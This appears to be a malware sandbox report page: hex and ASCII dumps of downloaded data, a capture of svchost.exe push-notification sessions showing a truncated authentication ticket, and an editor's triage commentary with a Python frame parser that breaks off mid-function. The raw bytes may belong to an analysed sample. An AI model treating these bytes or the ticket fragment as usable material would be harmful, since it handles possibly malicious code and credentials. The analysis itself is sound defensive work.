                                                          2022-09-11 08:16:26 UTC596INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2022-09-11 08:16:26 UTC597INData Raw: b6 2e 98 00 d0 48 98 00 de 46 98 00 ec 74 98 00 fa 62 98 00 14 8d 99 00 24 bd 99 00 3a a3 99 00 54 cd 99 00 60 f9 99 00 78 e1 99 00 90 09 99 00 a0 39 99 00 bc 25 99 00 c8 51 99 00 d2 4b 99 00 de 47 99 00 ee 77 99 00 fc 65 99 00 08 92 9a 00 14 8e 9a 00 2a b0 9a 00 3c a6 9a 00 4e d4 9a 00 60 fa 9a 00 70 ea 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e3 34 10 da 89 43 10 af d3 6c 10 dc be 72 10 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 b5 ad 10 60 dd ad 10 53 2c 1d 37 3d 11 1d 24 22 1d 0c 06 16 00 73 00 6d 1e 10 0c 1d 17 00 4b 4a 08 00 6c 45 2b 0d 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00 4b 0e 17 1c 0b 09 7f 01 1c 6a 08 00 4c 00 00 00 44 21 06 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00 46 2a 1f 35 34 17 00
                                                          Data Ascii: .HFtb$:T`x9%QKGwe*<N`p4Clr`S,7=$"smKJlE+5?rKjLD!5?rF*54
                                                          2022-09-11 08:16:26 UTC598INData Raw: 44 05 15 15 6c 07 0a 0d 07 5e 3c 01 1a 53 41 11 00 1c 05 0a 02 15 1d 06 01 4e 48 09 12 53 52 17 14 04 10 16 07 11 01 44 54 1c 0d 45 72 27 1b 1a 1d 04 08 45 54 1b 4f 54 11 17 1f 04 07 0f 15 11 45 49 1d 54 49 07 4e 41 0f 4e 55 1b 1b 06 06 14 0d 4c 57 16 18 57 24 5a 3c 09 04 12 16 45 43 0c 01 1a 15 02 17 54 54 1c 0d 45 41 11 00 1c 05 0a 02 15 1d 06 01 49 54 53 53 06 05 00 1f 1d 06 54 54 11 04 0c 4d 46 09 1d 52 4d 02 1d 17 45 49 07 08 09 1d 1f 0c 15 1d 06 01 40 23 07 0a 00 00 52 64 06 00 09 34 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 45 0b 18 1f 1b 1d 01 03 08 0b 1a 79 07 0a 52 64 06 00 08 35 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 41 13 15 12 18 08 0b 1a 07 7e 07 0a 00 00 52 64 06 00 02 3f 07 27
                                                          Data Ascii: Dl^<SANHSRDTEr'ETOTEITINANULWW$Z<ECTTEAITSSTTMFRMEI@#Rd4'NTEHSEFREyRd5'NTEHSEFRA~Rd?'
                                                          2022-09-11 08:16:26 UTC600INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 28 28 28 28 28 28 28 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 48 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 10 10 10 10 10 10 10 10 10 10 10 10 10 10 81 80 80 80 80 80 80 80 80 80 80 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: hh(((((((( HH
                                                          2022-09-11 08:16:26 UTC601INData Raw: 01 07 01 03 01 b7 00 72 57 00 57 49 00 73 00 00 00 64 00 00 00 48 0c 6d 00 00 00 6d 44 00 48 0c 59 00 00 00 79 4d 00 62 4b 00 4b 56 00 79 00 00 00 50 1d 4d 00 41 0c 4d 00 44 21 06 06 08 0f 07 17 72 00 00 00 4e 21 19 13 08 0f 07 17 72 00 00 00 4f 2c 17 1b 0d 07 17 72 53 36 15 04 11 08 0f 07 17 72 00 00 41 34 12 12 06 07 74 00 4a 3f 19 15 79 00 00 00 4a 3f 1b 0b 65 00 00 00 41 31 02 1b 05 6c 00 00 4d 2c 13 11 0b 68 00 00 46 23 07 10 07 14 13 0b 79 00 00 00 4a 2b 0f 1b 14 13 0b 79 44 21 06 63 4e 21 19 76 4f 2c 17 74 53 36 15 70 41 34 12 67 4a 3f 19 6c 4a 3f 1b 6e 4d 2c 18 79 41 31 02 72 4d 2c 13 72 46 23 07 62 4a 2b 0f 6e 53 32 15 01 07 16 05 18 79 00 00 00 46 34 1b 0d 05 18 79 00 54 3c 1d 07 01 17 05 18 79 00 00 00 57 32 01 0a 0b 16 17 05 18 79 00 00 54 21
                                                          Data Ascii: rWWIsdHmmDHYyMbKKVyPMAMD!rN!rO,rS6rA4tJ?yJ?eA1lM,hF#yJ+yD!cN!vO,tS6pA4gJ?lJ?nM,yA1rM,rF#bJ+nS2yF4yT<yW2yT!
                                                          2022-09-11 08:16:26 UTC602INData Raw: 78 e1 99 00 90 09 99 00 a0 39 99 00 bc 25 99 00 c8 51 99 00 d2 4b 99 00 de 47 99 00 ee 77 99 00 fc 65 99 00 08 92 9a 00 14 8e 9a 00 2a b0 9a 00 3c a6 9a 00 4e d4 9a 00 60 fa 9a 00 70 ea 9a 00 00 00 00 00 55 57 4e 23 0e 05 28 25 0b 10 13 13 0b 2e 57 00 a0 a1 46 22 11 24 22 1d 0c 22 25 00 16 17 16 00 73 00 4b 0e 17 1c 0b 09 7f 01 1c 4a 08 00 6c 00 46 47 46 22 11 37 36 07 00 17 0b 1a 20 3c 1a 17 04 05 2d 2d 64 00 10 11 46 22 11 37 2c 02 00 0c 0f 0a 28 25 07 0b 24 41 16 14 4a 2d 04 11 36 34 17 00 65 00 e9 e8 46 22 11 22 33 17 01 1a 06 01 2b 3d 39 41 10 12 4a 2d 04 11 31 2d 00 03 0c 63 a3 a2 46 22 11 24 22 1d 0c 06 16 00 3b 2d 04 11 70 00 5e 5d 57 31 17 1f 04 07 0f 15 11 35 22 1d 0c 06 16 00 73 00 42 43 46 22 11 37 36 07 00 17 0b 1a 24 22 1d 0c 06 16 00 73 6e
                                                          Data Ascii: x9%QKGwe*<N`pUWN#(%.WF"$""%sKJlFGF"76 <--dF"7,(%$AJ-64eF""3+=9AJ-1-cF"$";-p^]W15"sBCF"76$"sn
                                                          2022-09-11 08:16:26 UTC604INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2022-09-11 08:16:26 UTC605INData Raw: 00 00 92 92 00 c0 c8 08 00 00 00 00 00 00 93 93 00 c0 c8 08 00 00 00 00 00 00 03 03 00 00 07 07 00 00 78 78 00 00 0a 0a 00 00 02 02 00 00 d8 5e 86 10 18 08 00 00 ac 2a 86 10 19 09 00 00 80 06 86 10 1a 0a 00 00 e8 6d 85 10 00 10 00 00 bc 39 85 10 01 11 00 00 8c 09 85 10 02 12 00 00 68 ed 85 10 03 13 00 00 3c b9 85 10 08 18 00 00 04 81 85 10 09 19 00 00 dc 58 84 10 0a 1a 00 00 a4 20 84 10 0b 1b 00 00 6c e8 84 10 0c 1c 00 00 44 c0 84 10 0e 1e 00 00 24 a0 84 10 0f 1f 00 00 c0 43 83 10 30 20 00 00 88 0b 83 10 31 21 00 00 90 12 82 10 32 22 00 00 f0 71 81 10 68 78 00 00 e0 61 81 10 69 79 00 00 d0 51 81 10 6a 7a 00 00 c0 41 81 10 ec fc 00 00 bc 3d 81 10 ef ff 00 00 ac 2d 81 10 10 00 00 00 01 01 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
                                                          Data Ascii: xx^*m9h<X lD$C0 1!2"qhxaiyQjzA=-
                                                          2022-09-11 08:16:26 UTC606INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 7a 00 00 00 00 00 41 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: azAZ
                                                          2022-09-11 08:16:26 UTC608INData Raw: 5f 8b ab 10 ee 01 00 00 fe 01 00 00 2e 2e 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 25 96 8a 19 00 00 00 00 00 00 00 00 00 00 00 80 f0 70 00 01 01 00 00 f0 01 0e 00 ff 00 00 00 50 03 07 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 14 10 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3b ab 10 c0 7b ab 10 ef 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 e1 1e 00 00 3b 3b 00 00 5a 5a 00 00 78 78 00 00 97 97 00 00 b5 b5 00 00 d4 d4 00
                                                          Data Ascii: _.. %pPTPT;{;;ZZxx
                                                          2022-09-11 08:16:26 UTC609INData Raw: 04 00 00 00 00 01 01 09 0d 04 00 d8 d8 00 00 e8 28 c0 00 a8 8d 25 00 00 00 00 00 00 00 00 00 90 76 e6 00 14 14 00 00 00 00 00 00 00 00 00 00 a4 42 e6 00 56 56 00 00 e4 e0 04 00 00 00 00 00 28 28 00 00 30 30 00 00 60 60 00 00 01 01 20 20 00 00 00 00 80 a5 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 00 00 0d 0d 00 00 1c 1c 00 00 1c 1c 00 00 12 12 00 00 07 07 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 03 00 00 0a 0a 00 00 12 12 00 00 14 14 00 00 10 10 00 00 08
                                                          Data Ascii: (%vBVV((00`` %
                                                          2022-09-11 08:16:26 UTC610INData Raw: e3 00 e3 00 e3 00 e0 00 eb 0b d5 00 ed 38 e5 00 e5 00 e6 00 e6 00 e6 00 e6 00 e7 00 e7 00 e8 00 e8 00 db 00 f7 2c e9 00 e9 00 ea 00 ea 00 ea 00 ea 00 c3 00 b9 7a dc 00 00 f2 d1 00 00 88 88 00 00 3c 3c 00 00 0a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6f 00 00 90 29 00 00 29 29 00 00 29 29 00 00 29 29 00 00 29 1f 00 00 1f 00 00 00 00 0c 09 04 01 36 21 12 05 3c 25 1c 05 43 5f 1a 06 49 56 18 07 50 72 25 07 57 72 2d 08 5d 7a 2f 08 64 4e 23 09 57 72 2d 08 47 59 18 06 2d 3e 17 04 10 17 06 01 43 00 00 43 be 00 c4 7a da 00 da 00 db 00 db 00 da 00 d1 0b ba 00 2b 91 a6 00 00 a6 ce 00 8d 43 de 00 de 00 df 00 df 00 df 00 df 00 c4 00 ab 6f a6 00 00 a6 d0 00 93 43 e2 00 e2 00 e3 00 e3 00 e0 00 eb 0b bb 00 24 9b f5 00 00 ba b4
                                                          Data Ascii: 8,z<<o))))))))6!<%C_IVPr%Wr-]z/dN#Wr-GY->CCz+CoC$
                                                          2022-09-11 08:16:26 UTC612INData Raw: 14 14 00 00 14 1e 00 00 1e 94 00 00 94 b4 00 f7 43 b6 00 b6 00 b7 00 b7 00 b7 00 b7 00 b8 00 b8 00 b7 00 9b 2c cf 00 00 ff cf 00 00 4e 4e 00 00 0f 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 72 00 00 8d 69 00 00 69 a9 00 00 a9 72 00 00 72 69 00 00 69 18 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 0c 06 02 25 34 17 06 3d 26 13 08 5f 76 23 0a 83 b4 3b 0c 8a b0 37 0d 8e b2 31 0d a7 2a f3 7e 89 00 a8 21 83 00 83 00 85 00 85 00 87 00 87 00 a6 00 c9 6f 75 00 00 75 10 00 00 10 10 00 00 10 10 00 00 10 1a 00 00 1a 10 00 00 10 10 00 00 10 1a 00 00 1a 93 00 00 93 ae 00 ed 43 a8 00 a8 00 a9 00 a9 00 ad 00 ad 00 b0 00 e9 59 dd 00 00 96 b4 00 00 3b 3b 00 00 07 07 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: C,NNriirrii%4=&_v#;71*~!ouuCY;;
                                                          2022-09-11 08:16:26 UTC613INData Raw: f7 00 00 2f 39 00 00 0b 0b 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 8b 75 44 3a 0b 75 44 3a 0b 75 44 3a 0b 5d 77 24 0e 12 00 00 12 0a 00 00 0a 0c 00 00 0c 0e 00 00 0e 10 00 00 10 12 00 00 12 14 00 00 14 16 00 00 16 18 00 00 18 1a 00 00 1a 1c 00 00 1c 1e 00 00 1e 21 00 00 21 23 00 00 23 25 00 00 25 27 00 00 27 29 00 00 29 2b 00 00 2b 3e 00 00 3e 81 00 00 81 8e 00 0b 85 56 00 15 43 28 00 23 0b 20 00 20 00 20 00 20 00 22 00 22 00 3f 00 1e 21 64 00 2a 4e a2 00 3e 96 b5 00 00 da 9a 00 00 19 19 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 8b 70 5f 25 0a 70 5f 25 0a 70 5f 25
                                                          Data Ascii: /9tuD:uD:uD:]w$!!##%%''))++>>VC(# ""?!d*N>tp_%p_%p_%
                                                          2022-09-11 08:16:26 UTC617INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 43 00 00 ea 22 00 00 70 9c 00 00 9c a4 22 f2 74 95 c7 7e 2c 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8a b0 37 0d 84 bc 34 0c 7d 48 3e 0b 77 45 39 0b 70 5f 25 0a 69 45 26 0a 63 49 23 09 5c 7b 2f 08 56 72 2c 08 50 72 25 07 48 57 18 07 42 5e 1a 06 3c 25 1c 05 35 23 13 05 2f 3b 10 04 28 39 15 04 21 2f 0d 03 8d 04 0f 86 a0 31 19 88 67 4b 25 09 60 49 20 09 59 7f 2e 08 52 71 2b 08 4b 6b 27 07 45 58 1b 06 3d 27 1c 06 37 20 12 05 30 24 10 04 a4 05 3e 99 e9 00 00 89 99 00 00 4c 4c 00 00 13 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 65 6e 00 00 bd b7 00 00 fa e6 22 f2 74 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d
                                                          Data Ascii: C"p"t~,11174}H>wE9p_%iE&cI#\{/Vr,Pr%HWB^<%5#/;(9!/1gK%`I Y.Rq+Kk'EX='7 0$>LLFen"t11111
                                                          2022-09-11 08:16:26 UTC621INData Raw: b2 b2 a3 a3 9d 9d 89 89 fb fb f4 f4 ee ee d8 d8 d3 d3 cb cb c5 c5 3f 20 20 00 34 35 01 00 01 31 37 37 3e 3e 24 24 2c 2c 13 13 18 18 00 00 09 09 75 75 7a 7a 7f 7f 65 65 69 69 6f 6f 54 54 5a 5a 42 42 4e 4e a4 a4 af af 94 94 9f 9f 84 84 8f 8f f4 f4 e1 e1 ef ef d5 d5 c5 c5 22 23 29 29 05 05 61 61 53 53 80 80 86 86 f9 f9 c0 c0 cb cb 37 34 0b 0b 70 70 7c 7c b6 b6 bf bf ab ab 83 83 f7 f7 d4 d4 de de 25 24 54 54 5c 5c 9a 9a 80 80 e8 e8 c7 c7 06 01 51 51 43 43 fd fd fb fb c5 c5 3b 3a 04 04 0a 0a 7b 7b b2 b2 ba ba e9 e9 d2 d2 da da 34 37 3a 3a 8e 8f fc fc e4 e4 ee ee e9 e9 d1 d1 67 68 6e 6e 51 51 4b 4b b4 b4 a0 a0 9c 9c 93 93 da da 0c 0d 7f 7f 4e 4e b7 b7 a7 a7 9a 9a fb fb fe fe 68 6b 62 62 50 50 bb bb bd bd b7 b7 a7 a7 9d 9d 8a 8a 83 83 f1 f1 ee ee da da d3 d3 ca
                                                          Data Ascii: ? 45177>>$$,,uuzzeeiiooTTZZBBNN"#))aaSS74pp||%$TT\\QQCC;:{{47::ghnnQQKKNNhkbbPP
                                                          2022-09-11 08:16:26 UTC622INData Raw: 9b 72 73 c0 c0 2d 2e a0 a0 51 50 2d 22 77 77 50 50 57 57 4f 4f 44 44 b8 b8 bc bc 95 95 eb eb c9 c9 c0 c0 c4 c4 38 39 3d 3d 31 31 35 35 29 29 2d 2d 67 67 5d 5d 51 51 55 55 49 49 ef ef d8 d8 c5 c5 3a 39 32 32 36 36 2a 2a 0b 0b 61 61 b7 b7 ae ae a2 a2 a6 a6 9a 9a 9e 9e 92 92 96 96 8a 8a c0 c0 3a 3b 3f 3f 33 33 37 37 fa fd f0 f0 dc dc 79 78 6c 6c f4 f4 de de d1 d1 3d 70 70 00 20 20 00 00 2a 1a 77 77 41 41 9a 9a 89 89 a6 a7 99 99 2e 2d e0 e0 0f 08 7b 7b b5 b7 37 80 80 00 14 14 00 00 00 31 35 35 39 39 3d 3d 1d 1d 01 01 31 90 90 00 44 44 00 00 5c 6e 52 52 96 96 9a 9a fa fa da da 3a 3b 27 27 03 03 7f 7f 63 63 43 43 a3 a3 9f 9f 83 83 ff ff e3 e3 c3 c3 3f 38 24 24 04 04 64 64 44 44 a4 a4 84 84 e4 e4 c4 c4 38 39 25 25 35 00 00 a0 a0 00 e4 e4 00 00 08 38 fc fc e4 e4
                                                          Data Ascii: rs-.QP-"wwPPWWOODD89==1155))--gg]]QQUUII:92266**aa:;??3377yxll=pp *wwAA.-{{715599==1DD\nRR:;''ccCC?8$$ddDD89%%58


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
10         | 192.168.2.3 | 49762       | 20.199.120.182 | 443              | C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-11 08:18:14 UTC | 637 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 35 34 33 39 61 39 38 61 61 38 65 66 36 37 0d 0a 0d 0a
    Data Ascii: CNT 1 CON 246
                Context: 5c5439a98aa8ef67
2022-09-11 08:18:14 UTC | 637 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2022-09-11 08:18:14 UTC | 637 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 35 34 33 39 61 39 38 61 61 38 65 66 36 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
    Data Ascii: ATH 2 CON\DEVICE 1014
                Context: 5c5439a98aa8ef67
                <device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
2022-09-11 08:18:14 UTC | 638 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 35 34 33 39 61 39 38 61 61 38 65 66 36 37 0d 0a 0d 0a
    Data Ascii: BND 3 CON\QOS 29
                Context: 5c5439a98aa8ef67
2022-09-11 08:18:14 UTC | 638 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
    Data Ascii: 202 1 CON 58
2022-09-11 08:18:14 UTC | 638 | IN | Data Raw: 4d 53 2d 43 56 3a 20 6e 62 4f 4f 71 2f 7a 43 63 45 61 76 2f 39 65 72 41 4d 59 4c 4d 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
    Data Ascii: MS-CV: nbOOq/zCcEav/9erAMYLMw.0
                Payload parsing failed.
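Reading the session above (the four svchost.exe sessions that follow are the same exchange with different Context values): the client sends CNT with a <connect> agent description, ATH with a compact-ticket and BND, all carrying one per-connection Context header, and the server answers 202 with an MS-CV correlation vector and the text "Payload parsing failed.". Three things a triager should take from it. First, the number that ends each start line is a byte count of everything after that line: 246 = 29 (the Context header plus blank line) + 217 (the <connect> XML), BND's 29 is the Context block alone, and the reply's 58 = 35 (MS-CV header plus blank line) + 23 ("Payload parsing failed."). That framing rule is the editor's inference from the arithmetic in the capture, not something the report documents. Second, the report truncates long rows for display: ATH declares 1014 bytes but only the start of the compact-ticket is shown, so the full ATH body is not recoverable from this page. Third, to the editor's knowledge this CNT/ATH/BND framing with Context and MS-CV headers is what the Windows push-notification client hosted in svchost.exe normally speaks to Microsoft's notification service, and the <deviceName>VMware7,1</deviceName> in the connect payload is the analysis VM describing itself; the report makes neither observation, so before these sessions are attributed to the sample they should be compared with baseline traffic from the same VM image rather than read as its C2. The parser below is an added example written for this page, not code from the report or from Joe Sandbox; the function names (from_hex_row, split_start_line, parse_frames, parse_rows) are the editor's, and the sample input is session 10's rows re-typed from the table above.

```python
# Added example (not from the report): decode the report's "Data Raw" rows into frames.
# Framing rule, inferred from the capture rather than documented on the page:
#   "<VERB or STATUS> <SEQ> <RESOURCE> <LENGTH>\r\n" followed by LENGTH bytes made of
#   "Name: value\r\n" headers, a blank line, and the body.
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Frame:
    verb: str              # CNT/ATH/BND on the way out, a status such as 202 on the way back
    seq: int
    resource: str          # CON, CON\DEVICE, CON\QOS
    declared_len: int      # LENGTH from the start line
    headers: Dict[str, str]
    body: bytes
    missing: int           # declared_len minus bytes actually present; 0 means complete

    @property
    def complete(self) -> bool:
        return self.missing == 0


def from_hex_row(row: str) -> bytes:
    """One 'Data Raw:' column of the report ("43 4e 54 ...") back to bytes."""
    return bytes.fromhex(row)


def split_start_line(line: bytes) -> Optional[Tuple[str, int, str, int]]:
    """(verb, seq, resource, length) if `line` is a start line, else None."""
    try:
        f = line.decode("ascii").split(" ")
    except UnicodeDecodeError:
        return None
    if len(f) != 4 or not f[1].isdigit() or not f[3].isdigit():
        return None
    return f[0], int(f[1]), f[2], int(f[3])


def parse_frames(data: bytes) -> List[Frame]:
    """Cut a contiguous stream into frames; stop after one that is shorter than its
    declared LENGTH, since that length would otherwise swallow whatever follows."""
    frames: List[Frame] = []
    pos = 0
    while pos < len(data):
        eol = data.find(b"\r\n", pos)
        start_line = split_start_line(data[pos:eol]) if eol >= 0 else None
        if start_line is None:
            raise ValueError("malformed start line at offset %d: %r" % (pos, data[pos:pos + 40]))
        verb, seq, resource, length = start_line
        start = eol + 2
        chunk = data[start:start + length]            # header block + blank line + body
        sep = chunk.find(b"\r\n\r\n")
        head, body = (chunk, b"") if sep < 0 else (chunk[:sep], chunk[sep + 4:])
        headers: Dict[str, str] = {}
        for raw in head.split(b"\r\n"):
            name, colon, value = raw.decode("ascii", "replace").partition(":")
            if colon:
                headers[name.strip()] = value.strip()
        frames.append(Frame(verb, seq, resource, length, headers, body, length - len(chunk)))
        pos = start + len(chunk)
        if length != len(chunk):
            break
    return frames


def parse_rows(rows: List[bytes]) -> List[Frame]:
    """Parse the 'Data Raw' rows of one session direction, in report order. Rows are
    joined until one that itself opens with a start line arrives; the buffered bytes
    are then parsed on their own, so a row the report displays truncated (ATH declares
    1014 bytes, far fewer are shown) is marked incomplete instead of eating BND."""
    frames: List[Frame] = []
    buf = b""
    for row in rows:
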